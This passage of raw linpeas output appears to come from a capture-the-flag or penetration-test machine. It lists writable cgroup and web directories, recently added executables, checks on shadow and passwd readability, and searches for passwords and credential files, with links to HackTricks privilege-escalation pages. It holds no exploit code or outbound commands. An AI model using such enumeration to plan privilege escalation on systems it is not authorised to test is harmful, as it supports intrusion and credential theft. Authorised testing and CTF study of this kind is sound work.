/usr/local/sbin/cleancache.sh
/usr/bin/gettext.sh
╔══════════╣ Executable files potentially added by user (limit 70)
2023-02-12+11:35:47.5262858350 /var/lib/lxcfs/cgroup/memory/system.slice/systemd-logind.service/cgroup.event_control
2023-02-12+11:35:47.5233455830 /var/lib/lxcfs/cgroup/memory/system.slice/ifup@eth0.service/cgroup.event_control
2023-02-12+11:35:47.5193169360 /var/lib/lxcfs/cgroup/memory/system.slice/system-getty.slice/cgroup.event_control
2023-02-12+11:35:47.5144354070 /var/lib/lxcfs/cgroup/memory/system.slice/systemd-timesyncd.service/cgroup.event_control
2023-02-12+11:35:47.5108056660 /var/lib/lxcfs/cgroup/memory/system.slice/dbus.service/cgroup.event_control
2023-02-12+11:35:47.5063616340 /var/lib/lxcfs/cgroup/memory/system.slice/dev-hugepages.mount/cgroup.event_control
2023-02-12+11:35:47.5014851400 /var/lib/lxcfs/cgroup/memory/system.slice/acpid.service/cgroup.event_control
2023-02-12+11:35:47.4949269720 /var/lib/lxcfs/cgroup/memory/system.slice/php7.4-fpm.service/cgroup.event_control
2023-02-12+11:35:47.4863812300 /var/lib/lxcfs/cgroup/memory/system.slice/system-lvm2\x2dpvscan.slice/cgroup.event_control
2023-02-12+11:35:47.4799478780 /var/lib/lxcfs/cgroup/memory/system.slice/systemd-resolved.service/cgroup.event_control
2023-02-12+11:35:47.4738381840 /var/lib/lxcfs/cgroup/memory/system.slice/lvm2-lvmetad.service/cgroup.event_control
2023-02-12+11:35:47.4631773480 /var/lib/lxcfs/cgroup/memory/system.slice/proc-sys-fs-binfmt_misc.mount/cgroup.event_control
2023-02-12+11:35:47.4262852130 /var/lib/lxcfs/cgroup/memory/system.slice/snapd.socket/cgroup.event_control
2023-02-12+11:35:47.4234191460 /var/lib/lxcfs/cgroup/memory/system.slice/lxcfs.service/cgroup.event_control
2023-02-12+11:35:47.4202998740 /var/lib/lxcfs/cgroup/memory/system.slice/cloud-config.service/cgroup.event_control
2023-02-12+11:35:47.4170212400 /var/lib/lxcfs/cgroup/memory/system.slice/starting-page.service/cgroup.event_control
2023-02-12+11:35:47.4141705950 /var/lib/lxcfs/cgroup/memory/system.slice/rsyslog.service/cgroup.event_control
2023-02-12+11:35:47.4113842460 /var/lib/lxcfs/cgroup/memory/system.slice/uuidd.service/cgroup.event_control
2023-02-12+11:35:47.4083850090 /var/lib/lxcfs/cgroup/memory/system.slice/snapd.seeded.service/cgroup.event_control
2023-02-12+11:35:47.4049923800 /var/lib/lxcfs/cgroup/memory/system.slice/vgauth.service/cgroup.event_control
2023-02-12+11:35:47.4016353930 /var/lib/lxcfs/cgroup/memory/system.slice/dev-mqueue.mount/cgroup.event_control
2023-02-12+11:35:47.3982935590 /var/lib/lxcfs/cgroup/memory/system.slice/ssh.service/cgroup.event_control
2023-02-12+11:35:47.3940425300 /var/lib/lxcfs/cgroup/memory/system.slice/lxd.socket/cgroup.event_control
2023-02-12+11:35:47.3897399070 /var/lib/lxcfs/cgroup/memory/system.slice/atd.service/cgroup.event_control
2023-02-12+11:35:47.3866268420 /var/lib/lxcfs/cgroup/memory/system.slice/systemd-journald.service/cgroup.event_control
2023-02-12+11:35:47.3834444920 /var/lib/lxcfs/cgroup/memory/system.slice/cloud-init-local.service/cgroup.event_control
2023-02-12+11:35:47.3803600670 /var/lib/lxcfs/cgroup/memory/system.slice/accounts-daemon.service/cgroup.event_control
2023-02-12+11:35:47.3771589270 /var/lib/lxcfs/cgroup/memory/system.slice/auditd.service/cgroup.event_control
2023-02-12+11:35:47.3739546510 /var/lib/lxcfs/cgroup/memory/system.slice/sys-kernel-debug.mount/cgroup.event_control
2023-02-12+11:35:47.3706797350 /var/lib/lxcfs/cgroup/memory/system.slice/networkd-dispatcher.service/cgroup.event_control
2023-02-12+11:35:47.3675222700 /var/lib/lxcfs/cgroup/memory/system.slice/polkit.service/cgroup.event_control
2023-02-12+11:35:47.3640197090 /var/lib/lxcfs/cgroup/memory/system.slice/dev-mapper-ubuntu\x2d\x2dvg\x2dswap.swap/cgroup.event_control
2023-02-12+11:35:47.3606448570 /var/lib/lxcfs/cgroup/memory/system.slice/sys-kernel-config.mount/cgroup.event_control
2023-02-12+11:35:47.3571659270 /var/lib/lxcfs/cgroup/memory/system.slice/boot.mount/cgroup.event_control
2023-02-12+11:35:47.3527322630 /var/lib/lxcfs/cgroup/memory/system.slice/nginx.service/cgroup.event_control
2023-02-12+11:35:47.3484020380 /var/lib/lxcfs/cgroup/memory/system.slice/sys-fs-fuse-connections.mount/cgroup.event_control
2023-02-12+11:35:47.3413328120 /var/lib/lxcfs/cgroup/memory/system.slice/cron.service/cgroup.event_control
2023-02-12+11:35:47.3322267170 /var/lib/lxcfs/cgroup/memory/system.slice/systemd-udevd.service/cgroup.event_control
2023-02-12+11:35:47.3270985900 /var/lib/lxcfs/cgroup/memory/system.slice/systemd-networkd.service/cgroup.event_control
2023-02-12+11:35:47.3233772660 /var/lib/lxcfs/cgroup/memory/system.slice/open-vm-tools.service/cgroup.event_control
2023-02-12+11:35:47.3197360280 /var/lib/lxcfs/cgroup/memory/system.slice/irqbalance.service/cgroup.event_control
2023-02-12+11:35:47.3166884870 /var/lib/lxcfs/cgroup/memory/system.slice/cgroup.event_control
2023-02-12+11:35:47.3126134820 /var/lib/lxcfs/cgroup/memory/user.slice/cgroup.event_control
2023-02-12+11:35:47.3092801180 /var/lib/lxcfs/cgroup/memory/cgroup.event_control
2023-02-08+12:57:17.7808908480 /usr/local/sbin/cleancache.sh
2023-01-13+10:54:47.4696015670 /usr/local/sbin/laurel
2022-11-20+21:59:04.6543265010 /var/www/api/vendor/sabberworm/php-css-parser/bin/quickdump.php
2022-11-20+21:59:04.5303264290 /var/www/api/vendor/bramus/router/demo/index.php
2022-11-20+21:59:04.5303264290 /var/www/api/vendor/bramus/router/README.md
2022-11-20+21:53:41.5014786250 /usr/local/bin/composer
╔══════════╣ Unexpected in root
/vmlinuz
/initrd.img.old
/vmlinuz.old
/initrd.img
╔══════════╣ Files (scripts) in /etc/profile.d/
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#profiles-files
total 36
drwxr-xr-x 2 root root 4096 Feb 6 10:01 .
drwxr-xr-x 99 root root 4096 Feb 6 10:02 ..
-rw-r--r-- 1 root root 96 Sep 27 2019 01-locale-fix.sh
-rw-r--r-- 1 root root 1557 Dec 4 2017 Z97-byobu.sh
-rwxr-xr-x 1 root root 3417 Jun 3 2020 Z99-cloud-locale-test.sh
-rwxr-xr-x 1 root root 873 Jun 3 2020 Z99-cloudinit-warnings.sh
-rw-r--r-- 1 root root 835 Feb 23 2022 apps-bin-path.sh
-rw-r--r-- 1 root root 664 Apr 2 2018 bash_completion.sh
-rw-r--r-- 1 root root 1003 Dec 29 2015 cedilla-portuguese.sh
╔══════════╣ Permissions in init, init.d, systemd, and rc.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#init-init-d-systemd-and-rc-d
═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ No
═╣ Credentials in fstab/mtab? ........... No
═╣ Can I read shadow files? ............. No
═╣ Can I read shadow plists? ............ No
═╣ Can I write shadow plists? ........... No
═╣ Can I read opasswd file? ............. No
═╣ Can I write in network-scripts? ...... No
═╣ Can I read root folder? .............. No
╔══════════╣ Searching root files in home dirs (limit 30)
/home/
/home/dev/.bash_history
/root/
/var/www/html
/var/www/starting-page/blog/.next/trace
/var/www/starting-page/blog/.next/static
/var/www/starting-page/blog/.next/static/Z79wh4kSTt439cxBUytQN
/var/www/starting-page/blog/.next/static/Z79wh4kSTt439cxBUytQN/_buildManifest.js
/var/www/starting-page/blog/.next/static/Z79wh4kSTt439cxBUytQN/_ssgManifest.js
/var/www/starting-page/blog/.next/static/chunks
/var/www/starting-page/blog/.next/static/chunks/polyfills-c67a75d1b6f99dc8.js
/var/www/starting-page/blog/.next/static/chunks/pages
/var/www/starting-page/blog/.next/static/chunks/pages/_app-df511a3677d160f6.js
/var/www/starting-page/blog/.next/static/chunks/pages/index-c95e13dd48858e5b.js
/var/www/starting-page/blog/.next/static/chunks/pages/_error-dfcfa5bb62767c20.js
/var/www/starting-page/blog/.next/static/chunks/main-50de763069eba4b2.js
/var/www/starting-page/blog/.next/static/chunks/webpack-ee7e63bc15b31913.js
/var/www/starting-page/blog/.next/static/chunks/framework-8c5acb0054140387.js
/var/www/starting-page/blog/.next/export-marker.json
/var/www/starting-page/blog/.next/routes-manifest.json
/var/www/starting-page/blog/.next/build-manifest.json
/var/www/starting-page/blog/.next/package.json
/var/www/starting-page/blog/.next/BUILD_ID
/var/www/starting-page/blog/.next/cache/webpack/client-production/1.pack
/var/www/starting-page/blog/.next/cache/webpack/client-production/index.pack
/var/www/starting-page/blog/.next/cache/webpack/client-production/2.pack
/var/www/starting-page/blog/.next/cache/webpack/client-production/0.pack
/var/www/starting-page/blog/.next/next-server.js.nft.json
/var/www/starting-page/blog/.next/react-loadable-manifest.json
/var/www/starting-page/blog/.next/images-manifest.json
╔══════════╣ Searching folders owned by me containing others files on it (limit 100)
/var/www
/var/www/starting-page/blog/.next
/var/www/starting-page/blog/.next/cache/webpack/client-production
╔══════════╣ Readable files belonging to root and readable by me but not world readable
╔══════════╣ Modified interesting files in the last 5mins (limit 100)
/var/www/api/vendor/dompdf/dompdf/lib/fonts/dompdf_font_family_cache.php
/var/log/syslog
/var/log/auth.log
/var/log/journal/69623df55e8444d7934baf570db9aa6e/system.journal
logrotate 3.11.0
╔══════════╣ Files inside /var/www (limit 20)
total 28
drwxr-xr-x 7 www-data www-data 4096 Feb 12 10:54 .
drwxr-xr-x 14 root root 4096 Jan 16 09:49 ..
drwx------ 4 www-data www-data 4096 Feb 12 10:43 .config
drwx------ 3 www-data www-data 4096 Feb 12 10:54 .gnupg
drwxr-xr-x 3 www-data www-data 4096 Jan 16 09:49 api
drwxr-xr-x 2 root root 4096 Jan 31 14:01 html
drwxr-xr-x 3 www-data www-data 4096 Jan 16 09:49 starting-page
╔══════════╣ Files inside others home (limit 20)
/home/dev/.bashrc
/home/dev/.bash_logout
/home/dev/user.txt
/home/dev/.profile
/var/www/.config/configstore/update-notifier-npm.json
/var/www/.config/lxc/config.yml
/var/www/starting-page/blog/pages/index.js
/var/www/starting-page/blog/package.json
/var/www/starting-page/blog/.next/trace
/var/www/starting-page/blog/.next/static/Z79wh4kSTt439cxBUytQN/_buildManifest.js
/var/www/starting-page/blog/.next/static/Z79wh4kSTt439cxBUytQN/_ssgManifest.js
/var/www/starting-page/blog/.next/static/chunks/polyfills-c67a75d1b6f99dc8.js
/var/www/starting-page/blog/.next/static/chunks/pages/_app-df511a3677d160f6.js
/var/www/starting-page/blog/.next/static/chunks/pages/index-c95e13dd48858e5b.js
/var/www/starting-page/blog/.next/static/chunks/pages/_error-dfcfa5bb62767c20.js
/var/www/starting-page/blog/.next/static/chunks/main-50de763069eba4b2.js
/var/www/starting-page/blog/.next/static/chunks/webpack-ee7e63bc15b31913.js
/var/www/starting-page/blog/.next/static/chunks/framework-8c5acb0054140387.js
/var/www/starting-page/blog/.next/export-marker.json
/var/www/starting-page/blog/.next/routes-manifest.json
grep: write error: Broken pipe
╔══════════╣ Searching installed mail applications
╔══════════╣ Mails (limit 50)
╔══════════╣ Backup files (limited 100)
-rw-r--r-- 1 root root 11755 Jan 12 10:12 /usr/share/info/dir.old
-rw-r--r-- 1 root root 2746 Jan 23 2020 /usr/share/man/man8/vgcfgbackup.8.gz
-rw-r--r-- 1 root root 7867 Nov 7 2016 /usr/share/doc/telnet/README.telnet.old.gz
-rw-r--r-- 1 root root 361345 Feb 2 2018 /usr/share/doc/manpages/Changes.old.gz
-rwxr-xr-x 1 root root 226 Dec 4 2017 /usr/share/byobu/desktop/byobu.desktop.old
-rw-r--r-- 1 root root 217559 Jan 5 18:35 /usr/src/linux-headers-4.15.0-202-generic/.config.old
-rw-r--r-- 1 root root 0 Jan 5 18:35 /usr/src/linux-headers-4.15.0-202-generic/include/config/wm831x/backup.h
-rw-r--r-- 1 root root 0 Jan 5 18:35 /usr/src/linux-headers-4.15.0-202-generic/include/config/net/team/mode/activebackup.h
-rw-r--r-- 1 root root 217559 Nov 28 10:19 /usr/src/linux-headers-4.15.0-201-generic/.config.old
-rw-r--r-- 1 root root 0 Nov 28 10:19 /usr/src/linux-headers-4.15.0-201-generic/include/config/wm831x/backup.h
-rw-r--r-- 1 root root 0 Nov 28 10:19 /usr/src/linux-headers-4.15.0-201-generic/include/config/net/team/mode/activebackup.h
-rw-r--r-- 1 root root 35544 Sep 19 22:14 /usr/lib/open-vm-tools/plugins/vmsvc/libvmbackup.so
-rw-r--r-- 1 root root 1802 Aug 15 20:07 /usr/lib/python3/dist-packages/sos/report/plugins/ovirt_engine_backup.py
-rw-r--r-- 1 root root 1391 Nov 20 21:44 /usr/lib/python3/dist-packages/sos/report/plugins/__pycache__/ovirt_engine_backup.cpython-36.pyc
-rw-r--r-- 1 root root 2765 Aug 6 2020 /etc/apt/sources.list.curtin.old
-rw-r--r-- 1 www-data www-data 387580 Nov 20 22:07 /var/www/starting-page/blog/.next/cache/webpack/client-production/index.pack.old
-rw-r--r-- 1 root root 8881 Jan 5 18:35 /lib/modules/4.15.0-202-generic/kernel/drivers/net/team/team_mode_activebackup.ko
-rw-r--r-- 1 root root 9081 Jan 5 18:35 /lib/modules/4.15.0-202-generic/kernel/drivers/power/supply/wm831x_backup.ko
-rw-r--r-- 1 root root 8881 Nov 28 10:19 /lib/modules/4.15.0-201-generic/kernel/drivers/net/team/team_mode_activebackup.ko
-rw-r--r-- 1 root root 9081 Nov 28 10:19 /lib/modules/4.15.0-201-generic/kernel/drivers/power/supply/wm831x_backup.ko
╔══════════╣ Searching tables inside readable .db/.sql/.sqlite files (limit 100)
Found /var/lib/mlocate/mlocate.db: regular file, no read permission
╔══════════╣ Web files?(output limit)
/var/www/:
total 28K
drwxr-xr-x 7 www-data www-data 4.0K Feb 12 10:54 .
drwxr-xr-x 14 root root 4.0K Jan 16 09:49 ..
drwx------ 4 www-data www-data 4.0K Feb 12 10:43 .config
drwx------ 3 www-data www-data 4.0K Feb 12 10:54 .gnupg
drwxr-xr-x 3 www-data www-data 4.0K Jan 16 09:49 api
drwxr-xr-x 2 root root 4.0K Jan 31 14:01 html
drwxr-xr-x 3 www-data www-data 4.0K Jan 16 09:49 starting-page
╔══════════╣ All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)
-rw-rw-r-- 1 root root 21858 Feb 8 12:48 /usr/local/lib/x86_64-linux-gnu/perl/5.26.1/auto/Image/ExifTool/.packlist
-rw-r--r-- 1 root root 0 Oct 14 2021 /usr/lib/node_modules/npm/.npmrc
-rw-r--r-- 1 root root 3274 Nov 4 11:35 /usr/lib/node_modules/npm/.mailmap
-rw-r--r-- 1 root root 245 Nov 4 11:35 /usr/lib/node_modules/npm/.licensee.json
-rw-r--r-- 1 root root 126 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/lockfile/.travis.yml
-rw-r--r-- 1 root root 54 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/through/.travis.yml
-rw-r--r-- 1 root root 116 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/mkdirp/node_modules/minimist/.travis.yml
-rw-r--r-- 1 root root 84 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/smart-buffer/.prettierrc.yaml
-rw-r--r-- 1 root root 152 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/smart-buffer/.travis.yml
-rw-r--r-- 1 root root 4770 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/is-regex/.travis.yml
-rw-r--r-- 1 root root 4140 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/is-regex/.jscs.json
-rw-r--r-- 1 root root 48 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/builtins/.travis.yml
-rw-r--r-- 1 root root 715 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/https-proxy-agent/.editorconfig
-rw-r--r-- 1 root root 2935 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/https-proxy-agent/.eslintrc.js
-rw-r--r-- 1 root root 58 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/sorted-union-stream/.travis.yml
-rw-r--r-- 1 root root 113 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/getpass/.travis.yml
-rw-r--r-- 1 root root 1308 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/stream-iterate/node_modules/readable-stream/.travis.yml
-rw-r--r-- 1 root root 60 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/stream-iterate/.travis.yml
-rw-r--r-- 1 root root 562 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/fast-json-stable-stringify/.eslintrc.yml
-rw-r--r-- 1 root root 108 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/fast-json-stable-stringify/.travis.yml
-rw-r--r-- 1 root root 1160 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/color-name/.eslintrc.json
-rw-r--r-- 1 root root 119 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/prr/.travis.yml
-rw-r--r-- 1 root root 58 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/pumpify/node_modules/pump/.travis.yml
-rw-r--r-- 1 root root 68 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/pumpify/.travis.yml
-rw-r--r-- 1 root root 277 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/worker-farm/.editorconfig
-rw-r--r-- 1 root root 127 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/worker-farm/.travis.yml
-rw-r--r-- 1 root root 84 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/socks/.prettierrc.yaml
-rw-r--r-- 1 root root 185 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/socks/.travis.yml
-rw-r--r-- 1 root root 69 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/util-promisify/.travis.yml
-rw-r--r-- 1 root root 334 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/retry/.travis.yml
-rw-r--r-- 1 root root 286 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/normalize-package-data/node_modules/resolve/.editorconfig
-rw-r--r-- 1 root root 13 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/normalize-package-data/node_modules/resolve/.eslintignore
-rw-r--r-- 1 root root 8082 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/normalize-package-data/node_modules/resolve/.travis.yml
-rw-r--r-- 1 root root 62 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/stream-each/.travis.yml
-rw-r--r-- 1 root root 1308 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/duplexify/node_modules/readable-stream/.travis.yml
-rw-r--r-- 1 root root 65 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/duplexify/.travis.yml
-rw-r--r-- 1 root root 59 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/JSONStream/.travis.yml
-rw-r--r-- 1 root root 3817 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/node-gyp/.travis.yml
-rw-r--r-- 1 root root 193 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/performance-now/.tm_properties
-rw-r--r-- 1 root root 65 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/performance-now/.travis.yml
-rw-r--r-- 1 root root 421 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/fs-vacuum/.eslintrc
-rw-r--r-- 1 root root 215 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/fs-vacuum/.travis.yml
-rw-r--r-- 1 root root 150 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/isstream/.travis.yml
-rw-r--r-- 1 root root 134 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/mute-stream/.travis.yml
-rw-r--r-- 1 root root 38 Oct 14 2021 /usr/lib/node_modules/npm/node_modules/qrcode-terminal/.travis.yml
-rw-r--r-- 1 root root 72 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/libnpmsearch/.travis.yml
-rw-r--r-- 1 root root 189 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/sshpk/.travis.yml
-rw-r--r-- 1 root root 276 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/define-properties/.editorconfig
-rw-r--r-- 1 root root 6986 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/define-properties/.travis.yml
-rw-r--r-- 1 root root 4108 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/define-properties/.jscs.json
-rw-r--r-- 1 root root 178 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/http-signature/.dir-locals.el
-rw-r--r-- 1 root root 36 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/require-directory/.travis.yml
-rw-r--r-- 1 root root 91 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/har-validator/node_modules/json-schema-traverse/spec/.eslintrc.yml
-rw-r--r-- 1 root root 630 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/har-validator/node_modules/json-schema-traverse/.eslintrc.yml
-rw-r--r-- 1 root root 108 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/har-validator/node_modules/json-schema-traverse/.travis.yml
-rw-r--r-- 1 root root 439 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/har-validator/node_modules/ajv/.tonic_example.js
-rw-r--r-- 1 root root 62 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/har-validator/node_modules/ajv/scripts/.eslintrc.yml
-rw-r--r-- 1 root root 1151 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/is-date-object/.travis.yml
-rw-r--r-- 1 root root 2878 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/is-date-object/.jscs.json
-rw-r--r-- 1 root root 48 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/isarray/.travis.yml
-rw-r--r-- 1 root root 77 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/errno/.travis.yml
-rw-r--r-- 1 root root 6 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/psl/.eslintignore
-rw-r--r-- 1 root root 52 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/psl/.travis.yml
-rw-r--r-- 1 root root 48 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/typedarray/.travis.yml
-rw-r--r-- 1 root root 72 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/libnpmorg/.travis.yml
-rw-r--r-- 1 root root 66 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/validate-npm-package-name/.travis.yml
-rw-r--r-- 1 root root 43 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/archy/.travis.yml
-rw-r--r-- 1 root root 1308 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/through2/node_modules/readable-stream/.travis.yml
-rw-r--r-- 1 root root 309 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/agent-base/.travis.yml
-rw-r--r-- 1 root root 72 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/libnpmpublish/.travis.yml
grep: write error: Broken pipe
grep: write error: Broken pipe
╔══════════╣ Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)
-rw-r--r-- 1 root root 32707 Jan 13 10:52 /var/backups/apt.extended_states.0
-rw-r--r-- 1 root root 3743 Nov 20 22:36 /var/backups/apt.extended_states.3.gz
-rw-r--r-- 1 root root 3524 Jan 12 10:24 /var/backups/apt.extended_states.1.gz
-rw-r--r-- 1 root root 3523 Jan 10 12:46 /var/backups/apt.extended_states.2.gz
╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
/dev/mqueue
/dev/shm
/run/lock
/run/php
/run/screen
/tmp
/tmp/.ICE-unix
/tmp/.Test-unix
/tmp/.X11-unix
/tmp/.XIM-unix
/tmp/.font-unix
#)You_can_write_even_more_files_inside_last_directory
/var/cache/apache2/mod_cache_disk
/var/crash
/var/lib/lxcfs/cgroup/memory/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/accounts-daemon.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/acpid.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/atd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/auditd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/boot.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/cloud-config.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/cloud-init-local.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/cron.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/dbus.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/dev-hugepages.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/dev-mapper-ubuntux2dx2dvgx2dswap.swap/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/dev-mqueue.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/ifup@eth0.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/irqbalance.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/lvm2-lvmetad.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/lxcfs.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/lxd.socket/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/networkd-dispatcher.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/nginx.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/open-vm-tools.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/php7.4-fpm.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/polkit.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/proc-sys-fs-binfmt_misc.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/rsyslog.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/snapd.seeded.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/snapd.socket/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/ssh.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/starting-page.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/sys-fs-fuse-connections.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/sys-kernel-config.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/sys-kernel-debug.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/system-getty.slice/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/system-lvm2x2dpvscan.slice/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-journald.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-logind.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-networkd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-resolved.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-timesyncd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-udevd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/uuidd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/vgauth.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/user.slice/cgroup.event_control
/var/lib/nginx/body
/var/lib/nginx/fastcgi
/var/lib/nginx/proxy
/var/lib/nginx/scgi
/var/lib/nginx/uwsgi
/var/lib/php/sessions
/var/tmp
/var/www
╔══════════╣ Interesting GROUP writable files (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
╔══════════╣ Searching passwords in history files
treatment of @ARGV elements
<li>Minor change to parsing of -@ argfile (comment lines may may no longer have
<li>No longer trim trailing spaces from arguments in -@ argfiles
<li>Added -password option for processing password-protected PDF documents
<li>Added Password option
<li>Improved -@ option to allow a UTF-8 BOM at the start of the input file
<li>Changed -@ to insert arguments at the current position in the command line
<li>Fixed bug introduced in 5.99 which broke the "-tagsFromFile @" feature
<li>Fixed problem which generated warnings about symbol "@indent" in Nikon.pm
expanded beyond its "Image" roots!)
<li>Assume '-TagsFromFile @' for any redirected tags (eg. '-SRCTAG>DSTTAG' or
<li>Ignore white space around '=' sign of arguments in '-@' file
<li>Fixed problem with new '-tagsFromFile @' feature which occurred when
<li>Allow target file to be specified by '@' with -TagsFromFile option
<li>Added -@ option and two utility files (iptc2xmp.args and xmp2iptc.args) to
╔══════════╣ Searching *password* or *credential* files in home (limit 70)
/bin/systemd-ask-password
/bin/systemd-tty-ask-password-agent
/etc/pam.d/common-password
/usr/lib/git-core/git-credential
/usr/lib/git-core/git-credential-cache
/usr/lib/git-core/git-credential-cache--daemon
/usr/lib/git-core/git-credential-store
#)There are more creds/passwds files in the previous parent folder
/usr/lib/grub/i386-pc/password.mod
/usr/lib/grub/i386-pc/password_pbkdf2.mod
/usr/lib/node_modules/npm/lib/config/clear-credentials-by-uri.js
/usr/lib/node_modules/npm/lib/config/get-credentials-by-uri.js
/usr/lib/node_modules/npm/lib/config/set-credentials-by-uri.js
/usr/lib/python3/dist-packages/cloudinit/config/__pycache__/cc_set_passwords.cpython-36.pyc
